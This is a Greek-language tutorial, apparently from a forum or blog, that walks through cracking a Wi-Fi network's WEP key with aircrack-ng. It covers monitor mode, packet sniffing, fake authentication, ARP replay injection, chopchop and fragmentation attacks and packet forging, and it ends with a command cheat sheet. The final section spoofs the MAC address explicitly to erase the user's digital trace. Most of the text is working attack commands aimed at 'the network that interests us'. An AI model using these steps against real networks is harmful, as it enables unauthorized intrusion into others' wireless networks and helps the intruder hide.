
Γλωσσάρι :
AP [Access Point ] : Σημείο πρόσβασης από το οποίο χρήστες (clients) μπορούν να έχουν πρόσβαση σε ένα δίκτυο. Οι Wireless AP δίνουν τη δυνατότητα ασύρματης πρόσβασης σε ένα δίκτυο και σε ό,τι άλλο αυτό προσφέρει - internet, κλπ.
WEP [Wired Equivalent Protection] : Τύπος κρυπτογράφησης των ασυρμάτων δικτύων.
Πακέτο (packet) : Η ελάχιστη μονάδα συμπύκνωσης (πακεταρίσματος) των δεδομένων κατά τη διάρκεια οποιασδήποτε μεταφοράς και επικοινωνίας μεταξύ δύο υπολογιστών. Σε κάθε είδος δικτύου, υπάρχει συνεχής ροή "πακέτων" από και προς κάθε σταθμό του δικτύου. Στην περίπτωση των ασυρμάτων δικτύων, η μεταφορά αυτή γίνεται "μέσω του αέρα", χωρίς την χρήση καλωδίων. Σε περίπτωση χρήσης κλειδιού κρυπτογράφησης (για λόγους ασφαλείας) τα πακέτα αυτά είναι κρυπτογραφημένα με ένα κλειδί WEP.
MAC Address : Μια μοναδική ψηφιακή ταυτότητα που χαρακτηρίζει κάθε ασύρματη κάρτα δικτύου.(π.χ. 00:15:5F:Β6:87:97)
ESSID : Το εμφανιζόμενο όνομα ενός ασύρματου δικτύου
BSSID : Η ψηφιακή ταυτότητα (MAC Address) του router (διανεμητή) ενός ασύρματου δικτύου.
CHANNEL : Κανάλι/Συχνότητα στην οποία εκπέμπει κάθε ασύρματο δίκτυο
SNIFFING : Η διαδικασία συλλογής των πακέτων που κυκλοφορούν σε ένα δίκτυο.
Τι χρειάζεται;
Μια εγκατεστημένη έκδοση του Linux - σε κάποια από τις διανομές (π.χ. Ubuntu 7.10). Κάντε download εδώ:
ΚΩΔΙΚΑΣ
http://www.ubuntu.com/getubuntu/download
Εγκατάσταση του driver για την ασύρματη κάρτα. Για κάρτα Atheros και πολλές άλλες, χρήσιμο είναι το πακετό drivers της MadWifi, Κάντε download εδώ:
ΚΩΔΙΚΑΣ
http://sourceforge.net/project/showfile
... p_id=82936Εγκατάσταση της συλλογής προγραμμάτων AirCrack-ng. Κάντε download εδώ:
ΚΩΔΙΚΑΣ
http://download.aircrack-ng.org/aircrac
... ta2.tar.gz (Εγκατάσταση στην Ubuntu, μπορεί να γίνει και - πληκτρολογώντας στην κονσόλα :$ sudo apt-get install aircrack-ng
Μετά την εγκατάσταση των προγραμμάτων, στη διάθεσή μας θα έχουμε τις εξής πολύ χρήσιμες εφαρμογές κονσόλας : airmon-ng, airodump-ng, aireplay-ng, aircrack-ng
Η διαδικασία :
Θέτουμε την ασύρματη κάρτα δικτύου σε Monitor Mode (έτσι ώστε να μπορούμε να συλλέξουμε όλα τα πακέτα που κυκλοφορούν στον αέρα χωρίς αυτά αναγκαστικά να προορίζονται σε εμάς.)
$ sudo airmon-ng stop ath0
$ sudo airmon-ng start wifi0
Ελέγχουμε τα υπάρχοντα δίκτυα επιλέγοντας αυτό το οποίο μας ενδιαφέρει. Καταγράφουμε Channel, ESSID, BSSID.
$ sudo airodump-ng ath0
Ξεκινάμε το sniffing προσδιορίζοντας όλα τα στοιχεία που έχουμε ήδη καταγράψει για το δίκτυο που μας ενδιαφέρει και αποθηκεύουμε τα πακέτα σε ένα αρχείο "dump" (οι όροι με κεφαλαία αντικαθίστανται από αυτούς που έχουμε σημειώσει)
$ sudo airodump-ng -c CHANNEL --bssid BSSID --write dump ath0
Εντοπίζουμε την MAC Address της κάρτας μας πληκτρολογώντας
$ ifconfig
Χωρίς να σταματήσουμε το sniffing - σε άλλο tab της κονσόλας, θα προσπαθήσουμε άτυπα να "συνδεθούμε" με το δικτύο, έτσι ώστε εκείνο να μας στέλνει πακέτα.
$ sudo aireplay-ng -1 30 -q 1 -e ESSID -a BSSID -h MAC ath0
Επιχειρούμε να εντοπίσουμε την παραλαβή τυχόντων ARP Requests τις οποίες και αποστέλλουμε ξανά στον router, με σκοπό την επιτάχυνση παραλαβής κρυπτογραφημένων πακέτων.
$ sudo aireplay-ng -3 -b BSSID -h MAC -x 1024 ath0
Αφότου ξεκινήσει η παραλαβή/αποστολή των ARP Requests, ξεκινάμε την αποκρυπτογράφηση του κλειδιού WEP.
$ aircrack-ng -z -b BSSID dump
Μετά από μερικά λεπτά, και τη συλλογή μερικών δεκάδων χιλιάδων κρυπτογραφημένων πακέτων (ή αλλιώς IVs), το AirCrack θα σας εμφανίσει τον κωδικού WEP του κατά τ’ άλλα ασφαλούς δικτύου σας.
Καλή η θεωρία, αλλά - τουλάχιστον όσον αφορά την πρώτη απλουστευμένη εκδοχή WEP hacking - ήρθε ο καιρός να περάσουμε στην πράξη.
Τα παρακάτω είναι χρήσιμα μόνο εφ' όσον έχετε διαβάσει το πρώτο μέρος του άρθρου κι έχετε μια πλήρως εγκατεστημένη έκδοση Linux ή έχετε κάνει boot με μια εξειδικευμένη Live-CD Security Distro, π.χ. Backtrack (για την έκδοση 3-beta download κάντε κλικ εδώ κι ύστερα κάψτε το σ' ένα άδειο CD. Έτσι πιθανώς θα σας γλιτώσετε πιθανώς από επιπλέον εγκατάσταση drivers.)
* Στο παράδειγμα που ακολουθεί, έχω επιμελώς "σβήσει" κρίσιμα στοιχεία που αφορούν ESSIDs, BSSIDs και MAC Addresses (για προφανείς λόγους).
** Για μια καλύτερη άποψη επί του παραδείγματος, κάντε κλικ πάνω στις φωτογραφίες.
1) Ενεργοποίηση Monitor Mode
Εικόνα
2) Ξεκινάμε το sniffing και "τσεκάρουμε" το δίκτυο που μας ενδιαφέρει
Εικόνα
3) Επιχειρούμε Fake Authentication στο δίκτυο
Εικόνα
Στο πρώτο επιτυχυμένο fake authentication ο υπολογιστής μας - δηλαδή η ΜΑC Address μας , μπαίνει στη λίστα των stations που είναι συνδεδεμένοι με το AP.
Εικόνα
4) Ξεκινάμε την αλίευση ARP Requests
Εικόνα
Μετά από λίγο, το πρώτο ARP Request φτάνει, το aireplay-ng αναλαμβάνει τη μαζική αποστολή του προς το AP, με αποτέλεσμα ο sniffer (airodump-ng) να πλημμυρίζει σε ARP Requests δηλαδή κρυπτογραφημένα πακέτα.
Εικόνα
5) Ξεκινάμε παράλληλα το WEP Cracking
Διαλέγουμε το δίκτυο που μας ενδιαφέρει
ΚΩΔΙΚΑΣ
http://img291.imageshack.us/img291/8688
... ot6wy2.pngΠαρακολουθούμε το aircrack-ng εν δράση.
ΚΩΔΙΚΑΣ
http://img291.imageshack.us/img291/567/
... t22hn8.png6) Φτάνοντας στον στόχο μας
Καθίστε αναπαυτικά και παρακολουθείστε το aircrack-ng να βγάζει το αποτέλεσμα. Το μόνο που μένει είναι να καταγράψετε τον κωδικό κι όταν σας ζητηθεί, να τον πληκτρολογήσετε.
Για την συγκεκριμμένη περίσταση, προτείνω ένα ποτηράκι καλό αλκοόλ και μουσική υπόκρουση από Doors - κάτι σαν "This is the end, my only friend the end,...", κλπ, κλπ.
Συνοπτικά όλες οι εντολές που θα σας χρειαστούν για την αξιοποίηση της σουίτας Aircrack-ng
ΒΑΣΙΚΑ ΒΗΜΑΤΑ
1) Ενεργοποίηση της λειτουργίας Monitor Mode στην ασύρματη κάρτα
$ airmon-ng stop ath0
$ airmon-ng start wifi0
2) Συλλογή IVs και Sniffing
$ airodump-ng
-c CHANNEL
--bssid BSSID
-w FILE
ath0
3) Fake authentication
$ aireplay-ng
-1 0
-q PACKETSETS_PS [1]
-e ESSID
-a BSSID
-h MAC
ath0
4) ARP request Replay Mode
$ aireplay-ng
-3
-b BSSID
-h MAC
-x PACKETS_SEND_PS [900]
ath0
5) Ξεκλείδωμα WEP
$ aircrack-ng
- z (activate PTW vs FMS/KoreK attack)
-b BSSID
FILE
INJECTION
(αύξηση του traffic στο δίκτυο)
- Έλεγχος αν η κάρτα έχει δυνατότητες packet injection
$ aireplay-ng -9 ath0 (wifi0/wlan0)
1) ARP request Replay Mode
$ aireplay-ng
-3
-b BSSID
-h MAC
-x PACKETS_SEND_PS [900]
ath0
2) Previous ARP request Replay Mode
$ aireplay-ng
-3
-b BSSID
-h MAC
-r CAP_FILE
-x PACKETS_SEND_PS [900]
ath0
3) Interactive packet replay
a) Natural ###### ###### (χωρίς fake ID)
$ aireplay-ng
-2
-b BSSID
-d FF:FF:FF:FF:FF:FF
-t 1
ath0
β) Modified ###### ###### (χωρίς fake ID)
$ aireplay-ng
-2
-b BSSID
-d FF:FF:FF:FF:FF:FF
-t 1
-p 0841
ath0
CHOPCHOP/
FRAGMENTATION
(Αν είναι ενεργοποιημένο το MAC filtering)
1) Fragmentation
$ aireplay-ng
-5
-b BSSID
-h MAC
ath0
2) ChopChop
$ aireplay-ng
-4
-b BSSID
-h MAC
ath0
- Packet forging
$ packetforge-ng
-0
-a BSSID
-h MAC
-k 255.255.255.255
-l 255.255.255.255
-y FRAGMENT_XOR_FILE
-w ARP_REQUEST (FILE TO WRITE TO)
- Forged ARP packet injection
$ aireplay-ng
-2
-r ARP_REQUEST
ath0
MAC SPOOFING
(για να αλλάξετε την MAC Address σας και να εξαλείψετε το τελευταίο ψηφιακό σας ίχνος)
$ ifconfig ath0 down
$ ifconfig ath0 hw ether 00:11:22:33:44:55
$ ifconfig ath0 up 0